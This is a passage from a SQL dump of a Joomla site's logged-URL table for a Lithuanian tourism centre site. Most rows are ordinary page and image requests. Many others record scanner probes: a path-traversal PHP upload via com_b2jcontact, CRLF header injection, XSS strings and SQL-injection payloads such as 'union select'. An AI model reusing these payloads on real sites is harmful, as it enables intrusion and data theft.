00:00:00'),(4982,'https://infotytuvenai.lt/index.php/lt/turizmo-informacija/fancybox/fancy_shadow_nw.png','','https://infotytuvenai.lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','',1,0,'2021-10-14 12:29:35','0000-00-00 00:00:00'),(4983,'https://infotytuvenai.lt/index.php/lt/tytuvenu-festivalis/programos','','','',5,0,'2021-10-19 11:50:32','0000-00-00 00:00:00'),(4984,'https://www.infotytuvenai.lt/index.php/lt/component/content/article/31-apie-centra/','','https://www.infotytuvenai.lt/','',8,0,'2021-10-22 19:15:52','0000-00-00 00:00:00'),(4985,'https://www.infotytuvenai.lt/index.php/lt/41-apie-centra/','','https://www.infotytuvenai.lt/','',11,0,'2021-10-23 19:47:36','0000-00-00 00:00:00'),(4986,'https://www.infotytuvenai.lt/index.php/lt/43-apie-centra/','','https://www.infotytuvenai.lt/','',10,0,'2021-10-23 19:47:42','0000-00-00 00:00:00'),(4987,'https://www.infotytuvenai.lt/index.php/lt//feed/','','','',6,0,'2021-10-29 10:30:37','0000-00-00 00:00:00'),(4988,'https://www.infotytuvenai.lt/index.php/lt//2021/wp-includes/wlwmanifest.xml','','','',6,0,'2021-10-29 10:30:43','0000-00-00 00:00:00'),(4989,'https://infotytuvenai.lt/index.php/lt/?option=com_content&id=32:gydytoju-darbo-laikas&catid=2:uncategorised','','','',8,0,'2021-11-02 01:05:00','0000-00-00 00:00:00'),(4990,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=61:asmens-duomenu-apsauga&catid=2:uncategorised&Itemid=212','','','',8,0,'2021-11-02 01:07:39','0000-00-00 00:00:00'),(4991,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=30&Itemid=204','','','',4,0,'2021-11-02 01:08:32','0000-00-00 00:00:00'),(4992,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=88&id=18:meningokokines-infekcijos&Itemid=124','','','',1,0,'2021-11-02 01:19:07','0000-00-00 00:00:00'),(4993,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=630&id=16:covid-19-identifikavimas&Itemid=124','','','',1,0,'2021-11-02 03:43:28','0000-00-00 00:00:00'),(4994,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=298&id=18:meningokokines-infekcijos&Itemid=124','','','',1,0,'2021-11-02 03:43:48','0000-00-00 00:00:00'),(4995,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&id=305','','','',1,0,'2021-11-02 07:16:05','0000-00-00 00:00:00'),(4996,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=518&id=16:covid-19-identifikavimas&Itemid=124','','','',1,0,'2021-11-03 03:28:17','0000-00-00 00:00:00'),(4997,'https://www.infotytuvenai.lt/index.php/lt/?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=/../../../Raiz0WorM_1636077299.php','','','',1,0,'2021-11-05 02:08:07','0000-00-00 00:00:00'),(4998,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=4&id=18:meningokokines-infekcijos&Itemid=124','','','',1,0,'2021-11-05 22:08:03','0000-00-00 00:00:00'),(4999,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_n.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:47','0000-00-00 00:00:00'),(5000,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_ne.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:48','0000-00-00 00:00:00'),(5001,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_e.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:48','0000-00-00 00:00:00'),(5002,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_se.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:48','0000-00-00 00:00:00'),(5003,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_sw.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:49','0000-00-00 00:00:00'),(5004,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_s.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:49','0000-00-00 00:00:00'),(5005,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_nw.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:50','0000-00-00 00:00:00'),(5006,'https://infotytuvenai.lt/index.php/lt/apie-centra/fancybox/fancy_shadow_w.png','','https://infotytuvenai.lt/index.php/lt/apie-centra/edukacines-programos','',1,0,'2021-11-07 17:09:50','0000-00-00 00:00:00'),(5007,'https://www.infotytuvenai.lt/index.php/lt/?option=com_k2&view=874&id=16:covid-19-identifikavimas&Itemid=124','','','',1,0,'2021-11-08 04:32:03','0000-00-00 00:00:00'),(5008,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=990&layout=category&task=category&id=9&Itemid=124','','','',1,0,'2021-11-08 04:36:52','0000-00-00 00:00:00'),(5009,'https://infotytuvenai.lt/index.php/lt/robots.txt','','','',3,0,'2021-11-22 21:35:40','0000-00-00 00:00:00'),(5010,'https://infotytuvenai.lt/index.php/lt/wp-links-opml.php','','','',3,0,'2021-11-22 21:35:42','0000-00-00 00:00:00'),(5011,'https://infotytuvenai.lt/index.php/lt/license.txt','','','',3,0,'2021-11-22 21:35:42','0000-00-00 00:00:00'),(5012,'https://infotytuvenai.lt/index.php/lt/readme.html','','','',3,0,'2021-11-22 21:35:43','0000-00-00 00:00:00'),(5013,'https://infotytuvenai.lt/index.php/lt/admin/login.php','','','',3,0,'2021-11-22 21:35:45','0000-00-00 00:00:00'),(5014,'https://infotytuvenai.lt/index.php/lt/core/css/guest.css','','','',3,0,'2021-11-22 21:35:45','0000-00-00 00:00:00'),(5015,'https://infotytuvenai.lt/index.php/lt/core/js/backgroundjobs.js','','','',3,0,'2021-11-22 21:35:46','0000-00-00 00:00:00'),(5016,'https://infotytuvenai.lt/index.php/lt/admin/login','','','',3,0,'2021-11-22 21:35:47','0000-00-00 00:00:00'),(5017,'https://infotytuvenai.lt/index.php/lt/language/en-GB/en-GB.xml','','','',3,0,'2021-11-22 21:35:47','0000-00-00 00:00:00'),(5018,'https://infotytuvenai.lt/index.php/lt/administrator/manifests/files/joomla.xml','','','',4,0,'2021-11-22 21:35:48','0000-00-00 00:00:00'),(5019,'https://infotytuvenai.lt/index.php/lt/administrator','','','',3,0,'2021-11-22 21:35:49','0000-00-00 00:00:00'),(5020,'https://infotytuvenai.lt/index.php/lt/ui','','','',3,0,'2021-11-22 21:35:49','0000-00-00 00:00:00'),(5021,'https://infotytuvenai.lt/index.php/lt/?option=com_k2&view=item&id=22:svarbi-informacija&Itemid=124','','','',1,0,'2021-11-25 18:46:58','0000-00-00 00:00:00'),(5022,'https://infotytuvenai.lt/index.php/lt/maitinimas/gedulingi-pietus','','','',4,0,'2021-11-27 19:45:29','0000-00-00 00:00:00'),(5023,'https://www.infotytuvenai.lt/index.php/lt/images/KPF.jpg','','','',2,0,'2021-12-09 13:28:52','0000-00-00 00:00:00'),(5024,'https://www.infotytuvenai.lt/index.php/lt/images/5 page.jpg','','','',1,0,'2021-12-24 06:25:53','0000-00-00 00:00:00'),(5025,'https://www.infotytuvenai.lt/index.php/lt/?option=com_fabrik&c=import&view=import','','','',1,0,'2021-12-25 09:07:10','0000-00-00 00:00:00'),(5026,'https://www.infotytuvenai.lt/index.php/lt/images/6 page.jpg','','','',1,0,'2021-12-25 15:12:07','0000-00-00 00:00:00'),(5027,'https://infotytuvenai.lt/index.php/lt/apie-centra; info@infotytuvenai.lt','','','',1,0,'2021-12-28 04:00:44','0000-00-00 00:00:00'),(5028,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra','','','',1,0,'2022-01-03 07:24:26','0000-00-00 00:00:00'),(5029,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/paslaugos','','','',1,0,'2022-01-03 07:24:29','0000-00-00 00:00:00'),(5030,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/ekskursijos','','','',1,0,'2022-01-03 07:24:39','0000-00-00 00:00:00'),(5031,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/edukacines-programos','','','',1,0,'2022-01-03 07:24:42','0000-00-00 00:00:00'),(5032,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/istatai','','','',1,0,'2022-01-03 07:24:52','0000-00-00 00:00:00'),(5033,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/darbo-uzmokestis','','','',1,0,'2022-01-03 07:24:58','0000-00-00 00:00:00'),(5034,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/veiklos-strategija','','','',1,0,'2022-01-03 07:24:59','0000-00-00 00:00:00'),(5035,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/parama','','','',1,0,'2022-01-03 07:25:01','0000-00-00 00:00:00'),(5036,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apie-centra/veiklos-ataskaitos','','','',1,0,'2022-01-03 07:25:02','0000-00-00 00:00:00'),(5037,'https://infotytuvenai.lt/index.php/lt/index.php/lt/pasiulymai','','','',1,0,'2022-01-03 07:25:05','0000-00-00 00:00:00'),(5038,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija','','','',1,0,'2022-01-03 07:25:05','0000-00-00 00:00:00'),(5039,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/aktyvus-poilsis','','','',1,0,'2022-01-03 07:25:16','0000-00-00 00:00:00'),(5040,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/kulinarinis-paveldas','','','',1,0,'2022-01-03 07:25:27','0000-00-00 00:00:00'),(5041,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/gido-paslaugos','','','',1,0,'2022-01-03 07:25:28','0000-00-00 00:00:00'),(5042,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/suvenyrai','','','',1,0,'2022-01-03 07:25:37','0000-00-00 00:00:00'),(5043,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/turizmo-marsrutai','','','',1,0,'2022-01-03 07:25:37','0000-00-00 00:00:00'),(5044,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/tytuvenu-regioninis-parkas','','','',1,0,'2022-01-03 07:25:46','0000-00-00 00:00:00'),(5045,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/dubysos-regioninis-parkas','','','',1,0,'2022-01-03 07:25:53','0000-00-00 00:00:00'),(5046,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/kurtuvenu-regioninis-parkas','','','',1,0,'2022-01-03 07:25:58','0000-00-00 00:00:00'),(5047,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/varniu-regioninis-parkas','','','',1,0,'2022-01-03 07:26:03','0000-00-00 00:00:00'),(5048,'https://infotytuvenai.lt/index.php/lt/index.php/lt/turizmo-informacija/video-apie-kelmes-krasta','','','',1,0,'2022-01-03 07:26:09','0000-00-00 00:00:00'),(5049,'https://infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas','','','',1,0,'2022-01-03 07:26:13','0000-00-00 00:00:00'),(5050,'https://infotytuvenai.lt/index.php/lt/index.php/lt/maitinimas/maitinimo-meniu','','','',1,0,'2022-01-03 07:26:21','0000-00-00 00:00:00'),(5051,'https://infotytuvenai.lt/index.php/lt/index.php/lt/apgyvendinimas','','','',1,0,'2022-01-03 07:26:26','0000-00-00 00:00:00'),(5052,'https://infotytuvenai.lt/index.php/lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai','','','',1,0,'2022-01-03 07:26:31','0000-00-00 00:00:00'),(5053,'https://infotytuvenai.lt/index.php/lt/index.php/lt/lankytini-objektai/muziejai','','','',1,0,'2022-01-03 07:26:37','0000-00-00 00:00:00'),(5054,'https://infotytuvenai.lt/index.php/lt/index.php/lt/projektai','','','',1,0,'2022-01-03 07:26:42','0000-00-00 00:00:00'),(5055,'https://infotytuvenai.lt/index.php/lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas','','','',1,0,'2022-01-03 07:26:50','0000-00-00 00:00:00'),(5056,'https://infotytuvenai.lt/index.php/lt/index.php/lt/projektai/ii-etapas-baznycios-restauravimas','','','',1,0,'2022-01-03 07:26:52','0000-00-00 00:00:00'),(5057,'https://infotytuvenai.lt/index.php/lt/index.php/lt/projektai/roziu-sodo-irengimo-projektas','','','',1,0,'2022-01-03 07:26:56','0000-00-00 00:00:00'),(5058,'https://infotytuvenai.lt/index.php/lt/index.php/lt/projektai/tytuvenu-kulturos-paveldas-ir-jo-pedsakai','','','',1,0,'2022-01-03 07:27:01','0000-00-00 00:00:00'),(5059,'https://infotytuvenai.lt/index.php/lt/index.php/lt/kontaktai','','','',1,0,'2022-01-03 07:27:03','0000-00-00 00:00:00'),(5060,'https://infotytuvenai.lt/index.php/lt/index.php/lt/tytuvenu-festivalis','','','',1,0,'2022-01-03 07:27:09','0000-00-00 00:00:00'),(5061,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=12','','','',1,0,'2022-01-03 07:28:53','0000-00-00 00:00:00'),(5062,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=24','','','',1,0,'2022-01-03 07:28:58','0000-00-00 00:00:00'),(5063,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=48','','','',1,0,'2022-01-03 07:29:10','0000-00-00 00:00:00'),(5064,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=60','','','',1,0,'2022-01-03 07:29:11','0000-00-00 00:00:00'),(5065,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=72','','','',1,0,'2022-01-03 07:29:18','0000-00-00 00:00:00'),(5066,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=84','','','',1,0,'2022-01-03 07:29:22','0000-00-00 00:00:00'),(5067,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=108','','','',1,0,'2022-01-03 07:29:53','0000-00-00 00:00:00'),(5068,'https://infotytuvenai.lt/index.php/lt/index.php/lt?start=168','','','',1,0,'2022-01-03 07:30:14','0000-00-00 00:00:00'),(5069,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/20140925/3.jpg','','','',1,0,'2022-01-06 02:10:49','0000-00-00 00:00:00'),(5070,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/4.jpg','','','',1,0,'2022-01-06 02:10:50','0000-00-00 00:00:00'),(5071,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/2.jpg','','','',1,0,'2022-01-06 02:11:23','0000-00-00 00:00:00'),(5072,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/6.jpg','','','',1,0,'2022-01-06 02:11:56','0000-00-00 00:00:00'),(5073,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/20140925/1.jpg','','','',1,0,'2022-01-06 02:12:29','0000-00-00 00:00:00'),(5074,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/20140925/2.jpg','','','',1,0,'2022-01-06 02:13:01','0000-00-00 00:00:00'),(5075,'https://infotytuvenai.lt/index.php/lt/images/KPF.jpg','','','',1,0,'2022-01-06 02:13:34','0000-00-00 00:00:00'),(5076,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/3.jpg','','','',1,0,'2022-01-06 02:14:07','0000-00-00 00:00:00'),(5077,'https://infotytuvenai.lt/index.php/lt/images/logas be fono 1.png','','','',1,0,'2022-01-06 02:14:08','0000-00-00 00:00:00'),(5078,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/5.jpg','','','',1,0,'2022-01-06 02:14:41','0000-00-00 00:00:00'),(5079,'https://infotytuvenai.lt/index.php/lt/images/stories/projektai/20140925/4.jpg','','','',1,0,'2022-01-06 02:14:42','0000-00-00 00:00:00'),(5080,'https://infotytuvenai.lt/index.php/lt/images/stories/naujienos/darb/word.png','','','',1,0,'2022-01-06 02:15:48','0000-00-00 00:00:00'),(5081,'https://infotytuvenai.lt/index.php/lt/images/stories/naujienos/darb/aprasas.docx','','','',1,0,'2022-01-06 02:40:18','0000-00-00 00:00:00'),(5082,'https://www.infotytuvenai.lt/index.php/lt/images/stories/naujienos/darb/aprasas.docx','','','',2,0,'2022-01-06 06:04:38','0000-00-00 00:00:00'),(5083,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/naujienos/darb/aprasas.docx','','','',1,0,'2022-01-08 04:10:01','0000-00-00 00:00:00'),(5084,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/images/stories/2021_2025_m_starteginis_veiklos_planas.pdf','','','',10,0,'2022-01-11 18:42:20','0000-00-00 00:00:00'),(5085,'https://www.infotytuvenai.lt/index.php/lt/administrator/manifests/files/joomla.xml','','','',6,0,'2022-01-23 02:21:44','0000-00-00 00:00:00'),(5086,'https://www.infotytuvenai.lt/index.php/lt/?option=com_arttcym&ctrl=frontmails&task=setNewIconShare','','','',1,0,'2022-01-26 07:33:06','0000-00-00 00:00:00'),(5087,'https://www.infotytuvenai.lt/index.php/lt/component/content/category/','','','',5,0,'2022-01-27 07:25:28','0000-00-00 00:00:00'),(5088,'https://infotytuvenai.lt/index.php/lt/.svn/entries','','','',5,0,'2022-01-28 06:16:45','0000-00-00 00:00:00'),(5089,'https://infotytuvenai.lt/index.php/lt/CVS/Root','','','',2,0,'2022-01-28 06:19:52','0000-00-00 00:00:00'),(5090,'https://infotytuvenai.lt/index.php/lt/CVS/Entries','','','',2,0,'2022-01-28 06:19:52','0000-00-00 00:00:00'),(5091,'https://infotytuvenai.lt/index.php/lt/DEADJOE','','','',2,0,'2022-01-28 06:19:57','0000-00-00 00:00:00'),(5092,'https://infotytuvenai.lt/index.php/lt/README','','','',2,0,'2022-01-28 06:19:57','0000-00-00 00:00:00'),(5093,'https://infotytuvenai.lt/index.php/lt/Trace.axd','','','',2,0,'2022-01-28 06:19:57','0000-00-00 00:00:00'),(5094,'https://infotytuvenai.lt/index.php/lt/README.TXT','','','',2,0,'2022-01-28 06:19:57','0000-00-00 00:00:00'),(5095,'https://infotytuvenai.lt/index.php/lt/WS_FTP.LOG','','','',1,0,'2022-01-28 06:19:58','0000-00-00 00:00:00'),(5096,'https://infotytuvenai.lt/index.php/lt/WEB-INF/','','','',1,0,'2022-01-28 06:19:58','0000-00-00 00:00:00'),(5097,'https://infotytuvenai.lt/index.php/lt/Web.sitemap','','','',1,0,'2022-01-28 06:19:58','0000-00-00 00:00:00'),(5098,'https://infotytuvenai.lt/index.php/lt/_vti_bin/','','','',1,0,'2022-01-28 06:19:58','0000-00-00 00:00:00'),(5099,'https://infotytuvenai.lt/index.php/lt/_vti_bot/','','','',1,0,'2022-01-28 06:19:58','0000-00-00 00:00:00'),(5100,'https://infotytuvenai.lt/index.php/lt/_vti_log/','','','',1,0,'2022-01-28 06:19:58','0000-00-00 00:00:00'),(5101,'https://infotytuvenai.lt/index.php/lt/_vti_cnf/','','','',1,0,'2022-01-28 06:19:58','0000-00-00 00:00:00'),(5102,'https://infotytuvenai.lt/index.php/lt/_vti_pvt/','','','',1,0,'2022-01-28 06:19:59','0000-00-00 00:00:00'),(5103,'https://infotytuvenai.lt/index.php/lt/_vti_shm/','','','',1,0,'2022-01-28 06:19:59','0000-00-00 00:00:00'),(5104,'https://infotytuvenai.lt/index.php/lt/_vti_script/','','','',1,0,'2022-01-28 06:19:59','0000-00-00 00:00:00'),(5105,'https://infotytuvenai.lt/index.php/lt/_vti_txt/','','','',1,0,'2022-01-28 06:19:59','0000-00-00 00:00:00'),(5106,'https://infotytuvenai.lt/index.php/lt/adojavas.inc','','','',1,0,'2022-01-28 06:19:59','0000-00-00 00:00:00'),(5107,'https://infotytuvenai.lt/index.php/lt/adovbs.inc','','','',1,0,'2022-01-28 06:19:59','0000-00-00 00:00:00'),(5108,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=\r\nrapid7: injected_value','','','',1,0,'2022-01-28 06:32:32','0000-00-00 00:00:00'),(5109,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=%0d%0arapid7:%20injected_value','','','',1,0,'2022-01-28 06:32:32','0000-00-00 00:00:00'),(5110,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=^(#$!@#$)(()))******','','','',1,0,'2022-01-28 06:32:33','0000-00-00 00:00:00'),(5111,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=\\\"><script>480463541','','','',1,0,'2022-01-28 06:32:34','0000-00-00 00:00:00'),(5112,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=</XSS/*-*/STYLE=xss:e/**/xpression(\\\"480463541\\\")>','','','',1,0,'2022-01-28 06:32:35','0000-00-00 00:00:00'),(5113,'https://infotytuvenai.lt/index.php/lt/?option=^(#$!@#$)(()))******&view=article&id=306','','','',1,0,'2022-01-28 06:32:35','0000-00-00 00:00:00'),(5114,'https://infotytuvenai.lt/index.php/lt/?option=\r\nrapid7: injected_value&view=article&id=306','','','',1,0,'2022-01-28 06:32:35','0000-00-00 00:00:00'),(5115,'https://infotytuvenai.lt/index.php/lt/?option=%0d%0arapid7:%20injected_value&view=article&id=306','','','',1,0,'2022-01-28 06:32:36','0000-00-00 00:00:00'),(5116,'https://infotytuvenai.lt/index.php/lt/?option=\\\"><script>480463541&view=article&id=306','','','',1,0,'2022-01-28 06:32:38','0000-00-00 00:00:00'),(5117,'https://infotytuvenai.lt/index.php/lt/?option=</XSS/*-*/STYLE=xss:e/**/xpression(\\\"480463541\\\")>&view=article&id=306','','','',1,0,'2022-01-28 06:32:38','0000-00-00 00:00:00'),(5118,'https://infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=\"\'','','','',1,0,'2022-01-28 06:32:40','0000-00-00 00:00:00'),(5119,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu\"','','','',1,0,'2022-02-21 01:58:25','0000-00-00 00:00:00'),(5120,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai2121121121212.1','','','',1,0,'2022-02-21 01:58:32','0000-00-00 00:00:00'),(5121,'https://www.infotytuvenai.lt/index.php/lt/apie-centra2121121121212.1','','','',1,0,'2022-02-21 01:58:32','0000-00-00 00:00:00'),(5122,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos2121121121212.1','','','',1,0,'2022-02-21 01:58:32','0000-00-00 00:00:00'),(5123,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas2121121121212.1','','','',1,0,'2022-02-21 01:58:33','0000-00-00 00:00:00'),(5124,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content2121121121212.1','','','',1,0,'2022-02-21 01:58:34','0000-00-00 00:00:00'),(5125,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai and 1=1','','','',1,0,'2022-02-21 01:58:34','0000-00-00 00:00:00'),(5126,'https://www.infotytuvenai.lt/index.php/lt/?option=com_content&view=article&id=3062121121121212.1','','','',1,0,'2022-02-21 01:58:34','0000-00-00 00:00:00'),(5127,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos2121121121212.1','','','',1,0,'2022-02-21 01:58:35','0000-00-00 00:00:00'),(5128,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos and 1=1','','','',1,0,'2022-02-21 01:58:35','0000-00-00 00:00:00'),(5129,'https://www.infotytuvenai.lt/index.php/lt/maitinimas2121121121212.1','','','',1,0,'2022-02-21 01:58:35','0000-00-00 00:00:00'),(5130,'https://www.infotytuvenai.lt/index.php/lt/apie-centra and 1=1','','','',1,0,'2022-02-21 01:58:36','0000-00-00 00:00:00'),(5131,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas and 1=1','','','',1,0,'2022-02-21 01:58:36','0000-00-00 00:00:00'),(5132,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis2121121121212.1','','','',1,0,'2022-02-21 01:58:34','0000-00-00 00:00:00'),(5133,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content and 1=1','','','',1,0,'2022-02-21 01:58:37','0000-00-00 00:00:00'),(5134,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai and 1>1','','','',1,0,'2022-02-21 01:58:38','0000-00-00 00:00:00'),(5135,'https://www.infotytuvenai.lt/index.php/lt/maitinimas and 1=1','','','',1,0,'2022-02-21 01:58:38','0000-00-00 00:00:00'),(5136,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu2121121121212.1','','','',1,0,'2022-02-21 01:58:36','0000-00-00 00:00:00'),(5137,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos and 1>1','','','',1,0,'2022-02-21 01:58:39','0000-00-00 00:00:00'),(5138,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content and 1>1','','','',1,0,'2022-02-21 01:58:40','0000-00-00 00:00:00'),(5139,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/ekskursijos and 1=1','','','',1,0,'2022-02-21 01:58:40','0000-00-00 00:00:00'),(5140,'https://www.infotytuvenai.lt/index.php/lt/apie-centra and 1>1','','','',1,0,'2022-02-21 01:58:39','0000-00-00 00:00:00'),(5141,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas and 1>1','','','',1,0,'2022-02-21 01:58:40','0000-00-00 00:00:00'),(5142,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\' and \'x\'=\'x','','','',1,0,'2022-02-21 01:58:41','0000-00-00 00:00:00'),(5143,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\' and \'x\'=\'x','','','',1,0,'2022-02-21 01:58:42','0000-00-00 00:00:00'),(5144,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' and \'x\'=\'x','','','',1,0,'2022-02-21 01:58:42','0000-00-00 00:00:00'),(5145,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu and 1=1','','','',1,0,'2022-02-21 01:58:42','0000-00-00 00:00:00'),(5146,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis and 1=1','','','',1,0,'2022-02-21 01:58:40','0000-00-00 00:00:00'),(5147,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\' and \'x\'=\'x','','','',1,0,'2022-02-21 01:58:43','0000-00-00 00:00:00'),(5148,'https://www.infotytuvenai.lt/index.php/lt/apie-centra\' and \'x\'=\'x','','','',1,0,'2022-02-21 01:58:42','0000-00-00 00:00:00'),(5149,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\' and \'x\'=\'y','','','',1,0,'2022-02-21 01:58:44','0000-00-00 00:00:00'),(5150,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\' and \'x\'=\'y','','','',1,0,'2022-02-21 01:58:44','0000-00-00 00:00:00'),(5151,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\' and \'x\'=\'y','','','',1,0,'2022-02-21 01:58:45','0000-00-00 00:00:00'),(5152,'https://www.infotytuvenai.lt/index.php/lt/apie-centra\' and \'x\'=\'y','','','',1,0,'2022-02-21 01:58:47','0000-00-00 00:00:00'),(5153,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos\" and \"x\"=\"y','','','',1,0,'2022-02-21 01:58:48','0000-00-00 00:00:00'),(5154,'https://www.infotytuvenai.lt/index.php/lt/turizmo-informacija/aktyvus-poilsis and 1>1','','','',1,0,'2022-02-21 01:58:47','0000-00-00 00:00:00'),(5155,'https://www.infotytuvenai.lt/index.php/lt/?id=306&view=article&option=com_content\" and \"x\"=\"y','','','',1,0,'2022-02-21 01:58:49','0000-00-00 00:00:00'),(5156,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\' and \'x\'=\'y','','','',1,0,'2022-02-21 01:58:49','0000-00-00 00:00:00'),(5157,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai\" and \"x\"=\"y','','','',1,0,'2022-02-21 01:58:51','0000-00-00 00:00:00'),(5158,'https://www.infotytuvenai.lt/index.php/lt/apie-centra\" and \"x\"=\"y','','','',1,0,'2022-02-21 01:58:51','0000-00-00 00:00:00'),(5159,'https://www.infotytuvenai.lt/index.php/lt/maitinimas/maitinimo-meniu and 1>1','','','',1,0,'2022-02-21 01:58:51','0000-00-00 00:00:00'),(5160,'https://www.infotytuvenai.lt/index.php/lt/apie-centra/paslaugos999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:58:52','0000-00-00 00:00:00'),(5161,'https://www.infotytuvenai.lt/index.php/lt/lankytini-objektai/kulturos-paveldo-objektai999999.1 union select unhex(hex(version())) -- and 1=1','','','',1,0,'2022-02-21 01:58:54','0000-00-00 00:00:00'),(5162,'https://www.infotytuvenai.lt/index.php/lt/projektai/i-etapas-baznycios-restauravimas\" and \"x\"=\"y','','','',1,0,'2022-02-21 01:58:55','0000-00-00 